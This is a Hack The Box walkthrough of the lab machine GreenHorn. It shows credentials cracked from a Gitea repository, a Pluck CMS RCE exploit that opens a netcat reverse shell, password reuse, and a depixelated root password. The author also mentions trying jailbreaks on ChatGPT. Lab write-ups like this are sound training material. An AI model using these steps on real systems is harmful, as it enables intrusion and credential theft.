![[gree1.png]] ## Overview [GreenHorn](https://app.hackthebox.com/machines/GreenHorn) **GreenHorn** is an easy-difficulty Linux machine that involves enumerating a `Gitea` repository to obtain hardcoded admin credentials for a `Pluck CMS` panel which allows us to run an exploit for a vulnerability for the version of Pluck CMS running which provides with a foothold in the form of a reverse shell. From there we are able to escalate to user by exploiting password reuse and finally acquire the root user's password by using open source tools to de-pixelate an obscured image. ## Enumeration Initial Nmap scan. ``` $ nmap -T4 -n -sC -sV -Pn -p- 10.129.231.80 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-30 18:26 CST Nmap scan report for 10.129.231.80 Host is up (0.083s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 57:d6:92:8a:72:44:84:17:29:eb:5c:c9:63:6a:fe:fd (ECDSA) |_ 256 40:ea:17:b1:b6:c5:3f:42:56:67:4a:3c:ee:75:23:2f (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Did not follow redirect to http://greenhorn.htb/ |_http-server-header: nginx/1.18.0 (Ubuntu) 3000/tcp open ppp? | fingerprint-strings: | GenericLines, Help, RTSPRequest: | HTTP/1.1 400 Bad Request | Content-Type: text/plain; charset=utf-8 | Connection: close | Request | GetRequest: | HTTP/1.0 200 OK | Cache-Control: max-age=0, private, must-revalidate, no-transform | Content-Type: text/html; charset=utf-8 | Set-Cookie: i_like_gitea=abc0976e42cfdbdf; Path=/; HttpOnly; SameSite=Lax | Set-Cookie: _csrf=XLpT1DCtF6ui0zxRWhAIaTR1Jq06MTczMzAxMjg0MDE2NzM3MjI2OQ; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax | X-Frame-Options: SAMEORIGIN | Date: Sun, 01 Dec 2024 00:27:20 GMT | <!DOCTYPE html> | <html lang="en-US" class="theme-auto"> | <head> | <meta name="viewport" content="width=device-width, initial-scale=1"> | <title>GreenHorn</title> | <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR3JlZW5Ib3JuIiwic2hvcnRfbmFtZSI6IkdyZWVuSG9ybiIsInN0YXJ0X3VybCI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWFnZS9wbmciLCJzaXplcyI6IjUxMng1MTIifSx7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYX | HTTPOptions: | HTTP/1.0 405 Method Not Allowed | Allow: HEAD | Allow: HEAD | Allow: GET | Cache-Control: max-age=0, private, must-revalidate, no-transform | Set-Cookie: i_like_gitea=35e1d78652b110a8; Path=/; HttpOnly; SameSite=Lax | Set-Cookie: _csrf=Rr2QMxxrOJdgp2AXyAAbmTdXZQ46MTczMzAxMjg0NTYxODU0MTc2MQ; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax | X-Frame-Options: SAMEORIGIN | Date: Sun, 01 Dec 2024 00:27:25 GMT |_ Content-Length: 0 ``` Add `10.129.231.80 greenhorn.htb` to the `/etc/hosts` file and accessing the site hosted on Port 80. ![[gree2.png]] Clicking on `admin` at the bottom brings us to login page which displays the version of pluck running on the web sever. ![[gree3.png]] https://github.com/Mrterrestrial/CVE-2023-50564 Searching for this version of `Pluck` and associated vulnerabilities we find a RCE (Remote Code Execution) exploit. `SearchSploit` returns the same information. ``` $ searchsploit pluck v4.7.18 ------------------------------------------------------------------------------ --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------ --------------------------------- Pluck v4.7.18 - Remote Code Execution (RCE) | php/webapps/51592.py pluck v4.7.18 - Stored Cross-Site Scripting (XSS) | php/webapps/51420.txt ------------------------------------------------------------------------------ --------------------------------- ``` https://nvd.nist.gov/vuln/detail/CVE-2023-50564 If we read the description for this exploit we are told that we need to have access to the `Pluck` admin panel. Let's take a loot at what is running on `Port 3000` that we discovered earlier. ![[gree4.png]] We're now looming at a `Gitea` page, let's go ahead and snoop around and see what we can find. ![[gree5 1.png]] Clicking on `Explore` we find a repository called `GreenAdmin / GreenHorn` - Lets click on it and see what's inside. We will likely be able to see the source code for the application. ![[gree6.png]] My first thought is to check the `login.php` entry to see if there's a hardcoded or default password mentioned in the code or in the comments somewhere. ![[gree8.png]] We see it reference a file called `pass.php`, and the `SHA512` hashing algorithm being mentioned. Let's look for the `pass.php` file and see if there's a hardcoded password hash inside. ![[gree7.png]] Bingo! We found it and have what looks like a `SHA512` hash. Let's copy it to a file and try cracking it with `hashcat`. If you run `hashcat --identify` on your file it will come back with a few guesses but `SHA512` should be at the top so you can specify `-m 1700` and crack it! ``` $ hashcat -m 1700 hash /usr/share/wordlists/rockyou.txt.gz hashcat (v6.2.6) starting ....[snipped].... {REDACT3D P@SSWORD} ``` ## Initial Access https://nvd.nist.gov/vuln/detail/CVE-2023-50564 https://github.com/Mrterrestrial/CVE-2023-50564 ![[gree9.png]] Now that we have access to the `admin` panel, we can use one of the exploits we found online for `CVE-2023-50564` to get a reverse shell on the target. I experimented with a few of them but the one that worked best for me was the one I linked to. ``` $ python3 exploit.py Enter the target URL (e.g., example.com): greenhorn.htb Enter the password for target authentication: {REDACT3D P@SSWORD} Enter your IP (for reverse shell): 10.10.14.110 Enter the port to listen on (for reverse shell): 1337 [*] Authenticating to the target... [+] Authentication successful. [*] Generating reverse shell PHP file... [+] Reverse shell PHP file created successfully as 'shell.php'. [*] Creating ZIP payload... [+] ZIP file created as 'payload.zip'. [*] Starting reverse shell listener on 10.10.14.110:1337 ... [*] Uploading payload to the target... Exception in thread Thread-1 (start_listener): Traceback (most recent call last): File "/usr/lib/python3.11/threading.py", line 1038, in _bootstrap_inner self.run() File "/usr/lib/python3.11/threading.py", line 975, in run self._target(*self._args, **self._kwargs) File "/home/d3adair/exploit.py", line 193, in start_listener server_socket.bind((Lhost, int(Lport))) OSError: [Errno 98] Address already in use [+] Payload uploaded successfully. [*] Triggering reverse shell at: http://greenhorn.htb/data/modules/payload/shell.php ``` Always make sure you start your `netcat` listener before running the exploit and specifying the port. ``` $ nc -lvnp 1337 listening on [any] 1337 ... connect to [10.10.14.110] from (UNKNOWN) [10.129.231.80] 53732 which python python2 python3 /usr/bin/python3 python3 -c 'import pty;pty.spawn("/bin/bash")'; www-data@greenhorn:~/html/pluck/data/modules/payload$ ``` https://zweilosec.github.io/posts/upgrade-linux-shell/ Voila! We now have a `netcat` reverse shell but you should be able to upgrade to a fully interactive TTY shell by following the instructions in the article i provided. ``` www-data@greenhorn:~/html$ ls /home git junior www-data@greenhorn:~/html$ ls -la /home/junior total 76 drwxr-xr-x 3 junior junior 4096 Jun 20 06:36 . drwxr-xr-x 4 root root 4096 Jun 20 06:36 .. lrwxrwxrwx 1 junior junior 9 Jun 11 14:38 .bash_history -> /dev/null drwx------ 2 junior junior 4096 Jun 20 06:36 .cache -rw-r----- 1 root junior 61367 Jun 11 14:39 'Using OpenVAS.pdf' -rw-r----- 1 root junior 33 Dec 1 00:26 user.txt ``` If we snoop around `/home` we find a folder for the `junior` user is a folder for a user called junior containing the `user.txt` flag and a PDF document. Running through the list of Linux PrivEsc checks, I tried to `su` as the `junior` user and used the password we found earlier for the admin panel and was successful. ``` www-data@greenhorn:/home/junior$ su junior Password: junior@greenhorn:~$ cat user.txt {REDACT3D P@SSWORD} ``` We got the `user.txt` flag! That was pretty easy all things considered. ``` $ ssh [email protected] The authenticity of host '10.129.231.80 (10.129.231.80)' can't be established. ED25519 key fingerprint is SHA256:FrgpM50adTncJAsWACDugfF7duPzn9d6RzjZZFHNtLo. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.129.231.80' (ED25519) to the list of known hosts. [email protected]: Permission denied (publickey). ``` Just to see if it was possible I tried to `SSH` as the `junior` user but this was denied. ## Privilege Escalation The `PDF` file is the only thing we really have to go off of so I decided to download it to my attacker machine by spawning a python http server and downloading it via the browser. ``` junior@greenhorn:~$ python3 -m http.server 8000 Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 10.10.14.110 - - [01/Dec/2024 02:15:28] "GET / HTTP/1.1" 200 - 10.10.14.110 - - [01/Dec/2024 02:15:30] "GET /Using%20OpenVAS.pdf HTTP/1.1" 200 - ``` Let's browse to `greenhorn.htb` on Port `8000` and we should see the `PDF` file. ![[gree10.png]] Once you have downloaded it go ahead and open it up on your machine and let's see what is inside. ![[gree11.png]] https://github.com/bishopfox/unredacter https://github.com/spipm/Depix https://github.com/JonasSchatz/DepixHMM ![[gree15.png]] After reading the PDF, we see that it is a message from Mr. Green to the new junior user instructing him on how to launch `OpenVAS` using the `sudo /usr/sbin/openvas` command along with a pixelated/obscured password for the `root` user. We will need a tool to `depixelate` this image. I tried seeing if ChatGPT would be willing to assist me in de-pixelating the image however even with a few jailbreaks I couldn't get it to do what I wanted. ``` $ git clone https://github.com/spipm/Depix.git Cloning into 'Depix'... remote: Enumerating objects: 250, done. remote: Counting objects: 100% (82/82), done. remote: Compressing objects: 100% (27/27), done. remote: Total 250 (delta 63), reused 55 (delta 55), pack-reused 168 (from 1) Receiving objects: 100% (250/250), 845.31 KiB | 22.85 MiB/s, done. Resolving deltas: 100% (121/121), done. ``` `Depix` was the one that worked for me although there are alternatives. You can take a screenshot of the pixelated image in the PDF however you can also use the `pdfimages` tool to extract the image itself from the PDF. ``` $ pdfimages -all 'Using OpenVAS.pdf' /home/d3adair/ ``` Once you have extracted the image you should be able to view it like we see below. ![[gree12.png]] Next we can use the `depix.py` tool to attempt to de-pixelate the obscured password to the best of it's ability. The tool comes with a selection of test images that ``` $ python3 depix.py -p /home/d3adair/image.png -s images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png -o /home/d3adair/image2.png 2024-11-30 21:01:25,983 - Loading pixelated image from /home/d3adair/image.png 2024-11-30 21:01:25,998 - Loading search image from images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png 2024-11-30 21:01:26,466 - Finding color rectangles from pixelated space 2024-11-30 21:01:26,467 - Found 252 same color rectangles 2024-11-30 21:01:26,467 - 190 rectangles left after moot filter 2024-11-30 21:01:26,467 - Found 1 different rectangle sizes 2024-11-30 21:01:26,467 - Finding matches in search image 2024-11-30 21:01:26,467 - Scanning 190 blocks with size (5, 5) 2024-11-30 21:01:26,492 - Scanning in searchImage: 0/1674 2024-11-30 21:02:05,367 - Removing blocks with no matches 2024-11-30 21:02:05,368 - Splitting single matches and multiple matches 2024-11-30 21:02:05,370 - [16 straight matches | 174 multiple matches] 2024-11-30 21:02:05,370 - Trying geometrical matches on single-match squares 2024-11-30 21:02:05,638 - [29 straight matches | 161 multiple matches] 2024-11-30 21:02:05,638 - Trying another pass on geometrical matches 2024-11-30 21:02:05,871 - [41 straight matches | 149 multiple matches] 2024-11-30 21:02:05,871 - Writing single match results to output 2024-11-30 21:02:05,872 - Writing average results for multiple matches to output 2024-11-30 21:02:08,861 - Saving output image to: /home/d3adair/image2.png ``` There are a few example images you can try but the one provided in the example on the tool page itself `debruinseq_notepad_Windows10_closeAndSpaced.png` worked for me just fine. ![[gree14.png]] You should now have a legible password, let's try to `su` as `root` and see if it works... ``` junior@greenhorn:~$ su root Password: root@greenhorn:/home/junior# cat /roort/root.txt {REDACT3D FL@G} ``` Aaaand it does! `GreenHorn` is officially pwned. ## Conclusion Overall, this was very easy machine but it's always interesting to use a tool that I've never used before in (`depix.py` in this case) and although the PrivEsc vector itself was a little CTF-y I never think it's a bad thing to learn a new technique or two. ![[gree13.png]]